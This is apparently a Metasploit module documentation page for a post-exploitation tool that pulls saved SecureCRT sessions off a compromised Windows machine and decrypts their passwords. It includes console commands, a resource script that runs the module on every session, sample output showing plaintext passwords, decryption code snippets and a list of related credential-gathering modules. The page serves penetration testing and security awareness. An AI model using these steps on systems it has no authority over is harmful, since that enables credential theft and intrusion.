Windows SecureCRT Session Information Enumeration - Metasploit
This page contains detailed information about how to use the post/windows/gather/credentials/securecrt metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows SecureCRT Session Information Enumeration
Module: post/windows/gather/credentials/securecrt
Source code: modules/post/windows/gather/credentials/securecrt.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will determine if SecureCRT is installed on the target system and, if it is, it will try to dump all saved session information from the target. The passwords for these saved sessions will then be decrypted where possible, using the decryption information that HyperSine reverse engineered. Note that whilst SecureCRT has installers for Linux, Mac and Windows, this module presently only works on Windows.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/credentials/securecrt
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/credentials/securecrt
msf post(securecrt) > show options
... show and set options ...
msf post(securecrt) > set SESSION session-id
msf post(securecrt) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/gather/credentials/securecrt")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
All SecureCRT installations are affected, regardless of which OS they are installed on, since they all use the same encryption mechanisms described by HyperSine in his GitHub paper. Note that at the moment this module only supports exploiting Windows machines.
Overview
All versions of SecureCRT have an option to allow users to store an encrypted copy of their session information on the local computer, allowing them to easily restart a session without having to reenter all the connection details such as the host, username, and password. These details are stored in a local session file, and SecureCRT will additionally encrypt the password with AES encryption.
Unfortunately for SecureCRT users, the encryption mechanism used uses a weak IV of all 0's, and the encryption keys that are utilized to encrypt the passwords have been publicly reversed and documented by HyperSine in his GitHub paper.
In addition, HyperSine also published a PoC script that allows users to decrypt SecureCRT session files, regardless of the version of SecureCRT installed. The only limitation is that users must know the SecureCRT configuration password if one was set at installation. At the time of writing, September 11, 2020, it appears that Vandyke, the creators of SecureCRT, have still not changed the implementation details for this session encryption algorithm.
This module ports the work from HyperSine and implements it in a Metasploit module that allows users to easily retrieve any SecureCRT session files from a compromised Windows machine and then decrypt the session passwords where its possible to do so. All session information retrieved will be stored a Metasploit loot file, along with the password if it can be decrypted.
Setup Steps
- Download the latest installer of SecureCRT from https://www.vandyke.com/cgi-bin/releases.php?product=securecrt. You will need a valid login, which can be obtained by completing the registration form at https://www.vandyke.com/cgi-bin/download_application.php?pid=scrt_x64_873&force=1, after which an email will be sent to you with the valid login details.
- Follow the installer's prompts to install the software. Select all the default settings.
- Once everything has been installed, start SecureCRT. A prompt will appear asking if one wants to set a configuration passphrase to encrypt sensitive data such as saved passwords and login actions. Set a passphrase of your choice here, but be sure to remember it.
- Set up a SSH server on your target. For Windows 10 v1809 and later and
Windows Server 2019 and later, this can be done by running the PowerShell
command
Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0
, followed byStart-Service sshd
.
Verification Steps
- Use SecureCRT to login to a SSH server of your choosing. When logging in, remember to select the check boxes to save the username (should be selected by default), as well as the checkbox to save the account password.
- Get a
meterpreter
session on the Windows host running SecureCRT. - Do:
run post/windows/gather/credentials/securecrt
- Optional: Run
set PASSPHRASE *SecureCRT configuration passphrase*
if a configuration passphrase was set for SecureCRT and you are aware of what its value is. - If the session file was saved on the target, the module will print out the details of the host and port that the user connected to, as well as which username the user signed in with and the plaintext version of the password that was used.
Options
PASSPHRASE
The configuration password that was set when SecureCRT was installed, if one was supplied. Note that if this value is not supplied and SecureCRT was set up to use a configuration password, it will not be possible to decrypt the encrypted SecureCRT passwords that are retrieved.
SESSION_PATH
The path to the SecureCRT session directory on the target's computer. By default this is normally
stored at C:\\Users\\*current user name*\\AppData\\Roaming\\VanDyke\\Config\\Sessions
if SecureCRT
is installed on the system, however SecureCRT also has a portable version that stores the session information
in a local folder along with the SecureCRT binary itself, allowing users to easily transfer their session
information between machines. In this case, users can set the SESSION_PATH
option to the location
of the session directory within the portable folder to allow them to obtain SecureCRT session
information even if a portable version of SecureCRT is utilized on the target.
Scenarios
Windows Server 2019 Standard Edition with SecureCRT v8.7.3 Build 2279 (Configuration Password Enabled)
msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt
msf6 post(windows/gather/credentials/securecrt) > info
Name: Windows SecureCRT Session Information Enumeration
Module: post/windows/gather/credentials/securecrt
Platform: Windows
Arch:
Rank: Normal
Provided by:
HyperSine
Kali-Team
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSPHRASE no The configuration password that was set when SecureCRT was installed, if one was supplied
SESSION yes The session to run this module on.
Description:
This module will determine if SecureCRT is installed on the target
system and, if it is, it will try to dump all saved session
information from the target. The passwords for these saved sessions
will then be decrypted where possible, using the decryption
information that HyperSine reverse engineered. Note that whilst
SecureCRT has installers for Linux, Mac and Windows, this module
presently only works on Windows.
References:
https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
msf6 post(windows/gather/credentials/securecrt) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/credentials/securecrt) > set Passphrase whatabadpassword
Passphrase => whatabadpassword
msf6 post(windows/gather/credentials/securecrt) > run
[*] Gathering SecureCRT session information from WIN-M5JU6L5RA9L
[*] Searching for session files in C:\Users\normal\AppData\Roaming\VanDyke\Config\Sessions
SecureCRT Sessions
==================
Filename Protocol Hostname Port Username Password
-------- -------- -------- ---- -------- --------
127.0.0.1 (1).ini telnet 127.0.0.1 23 RAPID7\Administrator thePassword123!
127.0.0.1 (2).ini ssh2 127.0.0.1 22 Administrator thePassword123!
127.0.0.1 (3).ini ssh2 127.0.0.1 22 Administrator
127.0.0.1.ini telnet 127.0.0.1 23
msf6 post(windows/gather/credentials/securecrt) >
Windows Server 2019 Standard Edition with SecureCRT v8.7.3 Build 2279 (Configuration Password Enabled, But No Password Provided)
msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt
msf6 post(windows/gather/credentials/securecrt) > info
Name: Windows SecureCRT Session Information Enumeration
Module: post/windows/gather/credentials/securecrt
Platform: Windows
Arch:
Rank: Normal
Provided by:
HyperSine
Kali-Team
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSPHRASE no The configuration password that was set when SecureCRT was installed, if one was supplied
SESSION yes The session to run this module on.
Description:
This module will determine if SecureCRT is installed on the target
system and, if it is, it will try to dump all saved session
information from the target. The passwords for these saved sessions
will then be decrypted where possible, using the decryption
information that HyperSine reverse engineered. Note that whilst
SecureCRT has installers for Linux, Mac and Windows, this module
presently only works on Windows.
References:
https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
msf6 post(windows/gather/credentials/securecrt) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/credentials/securecrt) > run
[*] Gathering SecureCRT session information from WIN-M5JU6L5RA9L
[*] Searching for session files in C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions
[-] It seems the user set a configuration password when installing SecureCRT!
[-] If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.
SecureCRT Sessions
==================
Filename Hostname Port Username Password
-------- -------- ---- -------- --------
127.0.0.1.ini 127.0.0.1 22 RAPID7\Administrator
[+] Session info stored in: /home/gwillcox/.msf4/loot/20200911125521_default_172.20.150.24_host.securecrt_s_951139.txt
[*] Post module execution completed
msf6 post(windows/gather/credentials/securecrt) >
Go back to menu.
Msfconsole Usage
Here is how the windows/gather/credentials/securecrt post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/credentials/securecrt
msf6 post(windows/gather/credentials/securecrt) > show info
Name: Windows SecureCRT Session Information Enumeration
Module: post/windows/gather/credentials/securecrt
Platform: Windows
Arch:
Rank: Normal
Provided by:
HyperSine
Kali-Team <[email protected]>
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSPHRASE no The configuration password that was set when SecureCRT was installed, if one was supplied
SESSION yes The session to run this module on.
SESSION_PATH no Specifies the session directory path for SecureCRT
Description:
This module will determine if SecureCRT is installed on the target
system and, if it is, it will try to dump all saved session
information from the target. The passwords for these saved sessions
will then be decrypted where possible, using the decryption
information that HyperSine reverse engineered. Note that whilst
SecureCRT has installers for Linux, Mac and Windows, this module
presently only works on Windows.
References:
https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
Module Options
This is a complete list of options available in the windows/gather/credentials/securecrt post exploitation module:
msf6 post(windows/gather/credentials/securecrt) > show options
Module options (post/windows/gather/credentials/securecrt):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSPHRASE no The configuration password that was set when SecureCRT was installed, if one was supplied
SESSION yes The session to run this module on.
SESSION_PATH no Specifies the session directory path for SecureCRT
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/credentials/securecrt post exploitation module:
msf6 post(windows/gather/credentials/securecrt) > show advanced
Module advanced options (post/windows/gather/credentials/securecrt):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/credentials/securecrt module can do:
msf6 post(windows/gather/credentials/securecrt) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/credentials/securecrt post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/credentials/securecrt) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Couldn't find any session files at <PATH>
- The SecureCRT registry key on the target is likely misconfigured. The directory at <PATH> is inaccessable or doesn't exist
- It was not possible to decode one of the v1 passwords successfully, please double check the results!
- It seems the user set a configuration password when installing SecureCRT!
- If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.
- Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target.
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Couldn't find any session files at <PATH>
Here is a relevant code snippet related to the "Couldn't find any session files at <PATH>" error message:
68: config_ini = []
69: tbl = []
70: begin
71: print_status("Searching for session files in #{path}")
72: config_ini += session.fs.file.search(path, '*.ini')
73: fail_with(Failure::BadConfig, "Couldn't find any session files at #{path}") if config_ini.empty?
74: rescue Rex::Post::Meterpreter::RequestError
75: fail_with(Failure::BadConfig, "The SecureCRT registry key on the target is likely misconfigured. The directory at #{path} is inaccessable or doesn't exist")
76: end
77:
78: # enum session file
The SecureCRT registry key on the target is likely misconfigured. The directory at <PATH> is inaccessable or doesn't exist
Here is a relevant code snippet related to the "The SecureCRT registry key on the target is likely misconfigured. The directory at <PATH> is inaccessable or doesn't exist" error message:
70: begin
71: print_status("Searching for session files in #{path}")
72: config_ini += session.fs.file.search(path, '*.ini')
73: fail_with(Failure::BadConfig, "Couldn't find any session files at #{path}") if config_ini.empty?
74: rescue Rex::Post::Meterpreter::RequestError
75: fail_with(Failure::BadConfig, "The SecureCRT registry key on the target is likely misconfigured. The directory at #{path} is inaccessable or doesn't exist")
76: end
77:
78: # enum session file
79: config_ini.each do |item|
80: file_name = item['path'] + session.fs.file.separator + item['name']
It was not possible to decode one of the v1 passwords successfully, please double check the results!
Here is a relevant code snippet related to the "It was not possible to decode one of the v1 passwords successfully, please double check the results!" error message:
126: (0..padded_plain_bytes.length).step(2) do |i|
127: if (padded_plain_bytes[i] == "\x00" && padded_plain_bytes[i + 1] == "\x00")
128: return padded_plain_bytes[0..i - 1].force_encoding('UTF-16LE').encode('UTF-8')
129: end
130: end
131: print_warning('It was not possible to decode one of the v1 passwords successfully, please double check the results!')
132: return nil # We didn't decode the password successfully, so just return nil.
133: end
134:
135: def securecrt_crypto_v2(ciphertext)
136: return nil if ciphertext.nil? || ciphertext.empty?
It seems the user set a configuration password when installing SecureCRT!
Here is a relevant code snippet related to the "It seems the user set a configuration password when installing SecureCRT!" error message:
149: plain_bytes_digest = padded_plain_bytes[4 + plain_bytes_length, 32]
150: if (OpenSSL::Digest::SHA256.new(plain_bytes).digest == plain_bytes_digest) # verify
151: return plain_bytes.force_encoding('UTF-8')
152: end
153:
154: print_warning('It seems the user set a configuration password when installing SecureCRT!')
155: print_warning('If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.')
156: return nil
157: end
158:
159: def securecrt_store_config(config)
If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.
Here is a relevant code snippet related to the "If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again." error message:
150: if (OpenSSL::Digest::SHA256.new(plain_bytes).digest == plain_bytes_digest) # verify
151: return plain_bytes.force_encoding('UTF-8')
152: end
153:
154: print_warning('It seems the user set a configuration password when installing SecureCRT!')
155: print_warning('If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.')
156: return nil
157: end
158:
159: def securecrt_store_config(config)
160: if config[:hostname].to_s.empty? || config[:service_name].to_s.empty? || config[:port].to_s.empty? || config[:username].to_s.empty? || config[:password].nil?
Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target.
Here is a relevant code snippet related to the "Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target." error message:
194: else
195: securecrt_path = expand_path(datastore['SESSION_PATH'])
196: end
197:
198: if securecrt_path.to_s.empty?
199: fail_with(Failure::NotFound, 'Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target.')
200: else
201: result = enum_session_file(securecrt_path)
202: columns = [
203: 'Filename',
204: 'Protocol',
Go back to menu.
Related Pull Requests
- #14806 Merged Pull Request: Rubocop recently landed modules continued
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14341 Merged Pull Request: Fix NIL Dereference Issues, Missing fail_with Statements, and Update Regex Inside SecureCRT Password Gatherer
- #14199 Merged Pull Request: Fix gather securecrt password bug
- #14118 Merged Pull Request: Origin/gather securecrt password
References
- CVE: Not available
- https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
See Also
Check also the following modules related to this module:
- post/windows/gather/credentials/aim
- post/windows/gather/credentials/avira_password
- post/windows/gather/credentials/bulletproof_ftp
- post/windows/gather/credentials/chrome
- post/windows/gather/credentials/comodo
- post/windows/gather/credentials/coolnovo
- post/windows/gather/credentials/coreftp
- post/windows/gather/credentials/credential_collector
- post/windows/gather/credentials/digsby
- post/windows/gather/credentials/domain_hashdump
- post/windows/gather/credentials/dynazip_log
- post/windows/gather/credentials/dyndns
- post/windows/gather/credentials/enum_cred_store
- post/windows/gather/credentials/enum_laps
- post/windows/gather/credentials/enum_picasa_pwds
- post/windows/gather/credentials/epo_sql
- post/windows/gather/credentials/filezilla_server
- post/windows/gather/credentials/flashfxp
- post/windows/gather/credentials/flock
- post/windows/gather/credentials/ftpnavigator
- post/windows/gather/credentials/ftpx
- post/windows/gather/credentials/gadugadu
- post/windows/gather/credentials/gpp
- post/windows/gather/credentials/heidisql
- post/windows/gather/credentials/icq
- post/windows/gather/credentials/idm
- post/windows/gather/credentials/ie
- post/windows/gather/credentials/imail
- post/windows/gather/credentials/imvu
- post/windows/gather/credentials/incredimail
- post/windows/gather/credentials/kakaotalk
- post/windows/gather/credentials/kmeleon
- post/windows/gather/credentials/line
- post/windows/gather/credentials/maxthon
- post/windows/gather/credentials/mcafee_vse_hashdump
- post/windows/gather/credentials/mdaemon_cred_collector
- post/windows/gather/credentials/meebo
- post/windows/gather/credentials/miranda
- post/windows/gather/credentials/moba_xterm
- post/windows/gather/credentials/mremote
- post/windows/gather/credentials/mssql_local_hashdump
- post/windows/gather/credentials/navicat
- post/windows/gather/credentials/nimbuzz
- post/windows/gather/credentials/opera
- post/windows/gather/credentials/operamail
- post/windows/gather/credentials/outlook
- post/windows/gather/credentials/postbox
- post/windows/gather/credentials/pulse_secure
- post/windows/gather/credentials/purevpn_cred_collector
- post/windows/gather/credentials/qq
- post/windows/gather/credentials/razer_synapse
- post/windows/gather/credentials/razorsql
- post/windows/gather/credentials/rdc_manager_creds
- post/windows/gather/credentials/redis_desktop_manager
- post/windows/gather/credentials/safari
- post/windows/gather/credentials/seamonkey
- post/windows/gather/credentials/skype
- post/windows/gather/credentials/smartermail
- post/windows/gather/credentials/smartftp
- post/windows/gather/credentials/spark_im
- post/windows/gather/credentials/srware
- post/windows/gather/credentials/sso
- post/windows/gather/credentials/steam
- post/windows/gather/credentials/tango
- post/windows/gather/credentials/teamviewer_passwords
- post/windows/gather/credentials/thunderbird
- post/windows/gather/credentials/thycotic_secretserver_dump
- post/windows/gather/credentials/tlen
- post/windows/gather/credentials/tortoisesvn
- post/windows/gather/credentials/total_commander
- post/windows/gather/credentials/trillian
- post/windows/gather/credentials/viber
- post/windows/gather/credentials/vnc
- post/windows/gather/credentials/windows_autologin
- post/windows/gather/credentials/windowslivemail
- post/windows/gather/credentials/windows_sam_hivenightmare
- post/windows/gather/credentials/winscp
- post/windows/gather/credentials/wsftp_client
- post/windows/gather/credentials/xchat
- post/windows/gather/credentials/xshell_xftp_password
Authors
- HyperSine
- Kali-Team <kali-team[at]qq.com>
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.